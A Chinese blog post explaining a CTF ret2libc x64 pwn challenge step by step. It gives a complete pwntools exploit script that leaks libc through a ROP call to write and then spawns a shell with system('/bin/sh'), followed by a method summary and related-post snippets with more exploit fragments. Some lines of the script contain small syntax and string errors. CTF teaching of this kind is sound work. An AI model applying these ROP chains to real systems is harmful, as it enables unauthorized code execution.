ret2libc_x64一道经典例题全过程解释

已于 2022-04-22 19:50:25 修改
阅读量975 收藏 9
点赞数 3
文章标签: 其他
于 2022-03-27 16:43:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Boyfml/article/details/123774743
版权
本文通过一道经典ret2libc_x64题目,详细介绍了如何利用栈溢出漏洞,通过两次payload构造,实现对write函数的调用以泄露libc基地址,最终调用system函数获取shell的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

《pwn》ret2libc_x64一道经典例题全过程解释。

题目链接:

https://pan.baidu.com/s/11Ljmo-_Vm43jUqZotokLIw?pwd=3yf9
提取码:3yf9

脚本展示

from pwn import*
p=process('./ret2libc_x64')
context.log_level='debug'
gdb.attach(p)
#使用ldd+ret2libc_x64指令来寻找文件所调用的库并且找到文件调用库地址 libc=ELF("libc_adress")
elf=ELF("./ret2libc_x64")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
#使用“ ROPgadget --binary ret2libc_x64 --only "pop|ret" ”来寻找下列地址,观察所需。
#64位文件参数传递的方式为:rdi,rsi,rdx,rcx,r8,r9.(一般write函数只需前三个寄存器,即控制前三个寄存器参数,甚至只控制前两个即可)
#write(1,buf,5)解释:rdi传1,rsi传buf,rdx传5.(5为能显示的字节数)。我们只需要将泄露函数即write函数的got表传到buf的位置,rdi一般都传参为1,意思标准输出屏幕。
pop_rsi_r15_ret=0x4006b1 
pop_rdi_ret=0x4006b3
padding=0x88#padding
#elf.got['write']_addr=6294104
#此为10进制(利用print(elf.got['write'])得到,化为16进制后与ida查看无异)
#可以通过ida观看,也可以直接借助elf工具,强烈推荐后者
#elf.plt['write']_addr=4195500
#print(elf.plt['write'])得到。化为16进制后与ida查看无异。
over_flow_adress=0x4005E6此为溢出函数地址
payload='a'*(0x88)+p64(pop_rdi_ret)+p64(1)+p64(pop_rsi_r15_ret)+p64(elf.got['write'])+p64(0)+p64(elf.plt['write'])+p64(over_flow_adress)
#栈溢出-——rdi地址———传参为1——rsi地址——将write函数got表传参达到目的——将r15传参为随意值0,ret返回到write函数plt表(相当于调用此函数),最后将返回到溢出函数。
#ps:plt表后面直接接返回函数地址。
p.sendlineafter("Input:\n",payload)
write_libc_addr=u64(p.recv(6).ljust(8,"\x00"))
#64位程序,接收到的地址只有6个字节,需要补充到8个字节才能u64解包。
#泄露函数在libc中的地址=libc基地址+偏移
print(hex(write_libc_addr))
#打印出地址,验证泄露是否成功
libc_base_addr=write_libc_addr-libc.symbols['write']
#libc的基地址=泄露函数在libc中的地址-泄露函数在libc中的偏移
#使用libc.symbols['泄露函数名字']查找偏移
system_addr=libc_base_addr+libc.symbols['system']


binsh=libc_base_addr+libc.search('bin/sh\x00').next()

sleep(1)#程序睡眠一秒,防止两个payload一起发送,达不到想要的效果。
payload='a'*(0x88)+p64(pop_rdi_ret)+p64(binsh)+p64(system_addr)
#先溢出——rdi传参为binsh——ret到system函数地址——system函数自动调用rdi里的参数
p.sendafter('Input:\n',payload)
p.interactive()

此大神文章讲述更详细https://blog.youkuaiyun.com/prettyX/article/details/107507184

一位大神老师写的解题思路

当我们程序中缺少一个关键参数(字符串)时,我们可以在栈溢出的基础上调用输入函数,手动向程序中输入这个字符串(比如说’/bin/sh’)

一个题目中没有system函数以及没有’/bin/sh’字符串的情况下,往往就要考虑到ret2libc

第一步:泄漏,跳回到溢出函数

第二步:再次触发溢出,跳转到libc中执行system(‘/bin/sh’)

调用输出函数泄漏got表:

32位下:payload = padding + p32(elf.plt[‘write’]) + p32(overflorw_addr) + p32(1) + p32(elf.got[‘write’]) + p32(4)

(注意32位程序传参在栈上)

64位下:payload = padding + p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_r15_ret) + p64(elf.got[‘write’]) + p64(0) + p64(elf.plt[‘write’]) + p64(overflow_addr)

以上两个payload实现的都是调用——write(1,elf.got[‘write’],?),并且跳回到了溢出函数的地址

跳回到溢出函数是因为要再次触发栈溢出,调用system(‘/bin/sh’)

接收泄漏的数据:

64位下:write_libc_addr = u64(p.recv(6).ljust(8,‘’\x00’))

32位下:write_libc_addr = u32(p.recv(4))

计算libc基地址:

libc_base_addr = write_libc_addr - libc.symbols[‘write’]

system_addr = libc_base_addr + libc.symbols[‘system’]

binsh = libc_base_addr + libc.search(‘/bin/sh\x00’).next()

ret2libc
huzai9527的博客
02-03 546
1. buooj - ciscn_2019_c_1(64 位) from pwn import * #p = remote('node3.buuoj.cn',28190) p = process('./ciscn_2019_c_1') context.log_level = 'debug' puts_plt = 0x4006e0 puts_got = 0x602020 gets_got = 0x602050 pop_rdi = 0x0000000000400c83 main = 0x4009a0 #ste
CTF-PWN-buuctf-ciscn_2019_c_1-ret2libc的典型使用
serfend's blog
04-15 2517
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1ENhfN3jAV0TAUKpEIeZ7zw?pwd=2n64 提取码:2n64 答案:flag{e8165d23-782e-47fd-9c16-0a002b1f08bd} 总体思路 发现加密位置,判断其溢出点 通过设置第一个字符为\0以让strlen返回0,从而避免payload被破坏 构造执行,溢出获取puts的地址,从而得到libc版本 再次溢出,执行获取sh
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
《pwn》ret2libc2—x64简答例题+脚本加解析
Aiyflwoers的博客
03-28 846
题目地址:链接: https://pan.baidu.com/s/1isG2u-fpihbPt_Lumd4q5A?pwd=r9vn 提取码:r9vn 脚本展示: from pwn import* p=process('./babyrop') context.log_level='debug' gdb.attach(p) elf=ELF("./babyrop") libc=ELF("/lib/x86_64-linux-gnu/libc.so.6") padding=0x28 pop_rdi_ret_addr=
CTFShow pwn07 (ret2libc-64bit
Mintind的博客
12-03 1397
CTFShow pwn07解题记录
BUUCTF--pwn--ciscn_2019_c_1【ret2libc_64】
qq_73149934的博客
12-06 342
BUUCTF--pwn--ciscn_2019_c_1
【HUST】信息系统安全:系统调用介入作业,安全策略制定,编写简单的64位ret2libc攻击程序
weixin_45695828的博客
05-21 1438
本次实验内容: 针对第一次作业的代码,利用seccomp方法进行对程序进行约束,使得attacker只能将/tmp/flag的内容,向标准输出(STDOUT )进行输出,且只能输出 32 bytes的内容。 要求: 1. 实现上述约束方法; 2. 通过attack,验证上述约束方法的效果,attack包括:1)调用system函数创建shell(或直接调用execve,或调用其它系统调用);2)向其它目标输出内容(如:STDERR)、输出长度调整(超过32 bytes)。 虽然说...
PWN基础17:Ret2Libc 64位实例
prettyX的博客
07-24 4652
复现一下Ret2Libc 32位下的内存布局 针对这张图,我们在上一节做了细致的分析 32位的调用方式 32位系统中调用函数的方式:栈传递参数 构造函数调用将参数和返回地址放在栈上 构造执行write(1,buf2,20)后,再返回main函数 64位的调用方式 64位系统中使用寄存器传递参数:rdi、rsi、rdx、rcx、r8、r9(1-6个参数) 这节课,我们研究的源码 #include <stdio.h> char buf2[10]="ret2libc is goo
关于ret2libc 的泄露 puts(64位)+write(32位)
最新发布
zhuo1358的博客
04-05 1397
这里提醒一下读者,一定要注意数据的接收顺序来编写recvuntil,笔者在这里卡了好久。这里还要注意栈对齐,要用寄存器多绕一步来维持栈平衡。开始找算偏移和构造system和binsh 的地址。同样还是找不到system 也没有flag等字符。也没有flag的字符,初步认为要泄露libc。很简单 read 函数存在明显的栈溢出。用ROR-gadget寻找合适的寄存器。这里要注意write函数要传入三个参数。接下来开始payload的构造。泄露出地址之后开始寻找版本。泄露出read的真实地址。
[CTF]PWN--新人入门第一关--Ret2libc
2301_79880752的博客
02-29 1554
首先我们需要找到pop rdi|ret这个指令在程序中的位置(前面提到该指令为程序中自带的,只不过需要我们去寻找),然后让程序返回到pop rdi|ret这个指令上去执行它,通过ROPgadget --binary pwn --only 'pop|ret' 该指令来寻找pop |ret这个指令的地址,其中ROPgadget为一个插件,需要自己下载,binary意思为一个二进制文件,后面跟着的是文件名,only后面跟着的为要搜索的命令地址。
[PWN][高级篇]ROP-ret2libc-32/64位实例 (共四个)
网络安全知识分享
03-28 5675
ROP-ret2libc-32实例 32位思路: 1、想办法调用execve("/bin/sh",null,null) 2、传入字符串/bin///sh 3、体统调用execve eax = 11 ebx = bin sh_addr ecx = 0 edx = 0 int 0x80 实例代码如下: 接下来我们检查保护 我们看到是有NX保护,没有canary和pie保护,我们使用ROP进行绕过。关键在于如何获取system 和 /bin/sh。 objdump -d -j .plt
ret2libc pwn
qq_41560595的博客
09-27 936
查看栈保护 F5查看源代码 看见gets函数,立刻想到是栈溢出题型,但是此题并未提供system("/bin/sh")函数。而程序运行的时候会调用libc.so,它包含了system()等函数,因此可以根据这个特性构造system("/bin/sh")。 判断覆盖量 查找system()的地址 objdump -d -j .plt ./ret 查找/bin/sh的地址 编写脚本 from pwn import * p=process('./ret') system_addr=0x08048460
pwn刷题num6--ret2libc
tbsqigongzi的博客
04-21 412
攻防世界pwn新手区level3 下载附件后发现是tar.gz文件, 使用该命令解压 tar -xvf 文件名 解压后保存到的目录 解压后发现给了libc,libc是c语言函数库,里面包含各种函数如write,read,system,也有字符串/bin/sh等 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位,小端序 开启部分RELRO---got表仍可写 未开启canary保护---存在栈溢出 开启NX保护----注入的shellcode不可执行 未开启PIE---
PWN篇:ret2libc
weixin_44644249的博客
01-28 526
PWN篇:ret2libc 源码 #include void vuln_func(){ char buf[128]; read(STDIN_FILENO,buf,256); } int main(int argc,char* argv[]){ vuln_func(); write(STDOUT_FILENO,"hello world!\n",13); } 很明显vuln为溢出函数 编译 gcc -m32 -fno-stack-protector -no-pie -z execstack tes
pwn ret2libc
清霂的博客
02-04 580
目录1.攻防世界 level32.buu babyrop3.buu ciscn_2019_c_1 1.攻防世界 level3 把文件放到kali里面发现是一个压缩包(放入exeinfo里面也可以发现是压缩包),解压缩得到level3和libc.so文件 file checksec ida32 进入漏洞函数vunl(),发现有栈溢出漏洞 没有system函数和/bin/sh 题目提示了用libc。 libc.so是一个函数库(类似于C语言#include<iostream>的iostrea
美团MTCTF 2022 ret2libc_aarch64 pwn解
z1r0的博客
09-18 847
这里,这条指令的含义是sp存储的地址放入x29,sp + 8放入x30,最后sp += 0x20,X30为程序链接寄存器,保存子程序结束后需要执行的下一条指令,所以我们需要将sp + 8这里填入system_addr。之所以不找mov是因为mov x0在pwn文件里是没有的,利用还是挺难的, 都有跳转指令,因为前面泄露出了libc地址,可以试着在libc里面寻找gadgets。粉色的是gadgets的地址,红色的最后会给到x0,所以我们在这里填入bin_sh地址。,先看一下pwn文件的gadgets。
使用ret2libc攻击方法绕过数据执行保护
weixin_30849591的博客
08-08 208
参考:[1]http://blog.youkuaiyun.com/linyt/article/details/43643499    [2]http://blog.youkuaiyun.com/zhongyunde/article/details/8607401 主要内从是从[1]中抄过来的,修改了测试用例,原始例子我这测试通不过。。。 前面介绍的攻击方法大量使用Shellcode,核心思想是修改EIP和...
r0pbaby——ret2libc
qq_41560595的博客
10-09 512
解题思路 使用libc.so.6获取里面的system和/bin/sh地址 先查看libc.so.6: libc.so.6是libc-2.27.so的软链接,需要把libc-2.27.so拷出来。 把libc-2.27.so拖到IDA中,在左侧窗口中任意单击一个函数,快捷键ctrl+f,输入system,查看其地址。 快捷键shift+f12调出字符串窗口,单击任意处按快捷键ctrl+f,输入/bin/sh,获得地址。 栈图 如图,当rsp指向pop rax;pop rdi;call rax时,ri
BUUCTF ciscn_2019_c_1(64位ret2libc3)
Rt1Text的博客
04-10 4623
1.checksec+运行 64位/NX保护 运行起来貌似很有意思,是一个加解密操作 后来发现只能加密不能解密 2. 强大的IDA进行中 1.main函数 貌似看不出什么 2.encrypt函数 加密具体操作 大小写字母/数字进行异或运算 发现gets()栈溢出 s大小0x50 需要先把加密函数绕过 该函数的功能就是循环对输入的字符串进行加密,在加密前都有一个检查,只要v0的值大于或等于字符串的长度就跳出循环,通过strlen来计算字符串长度的,strlen计算字.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值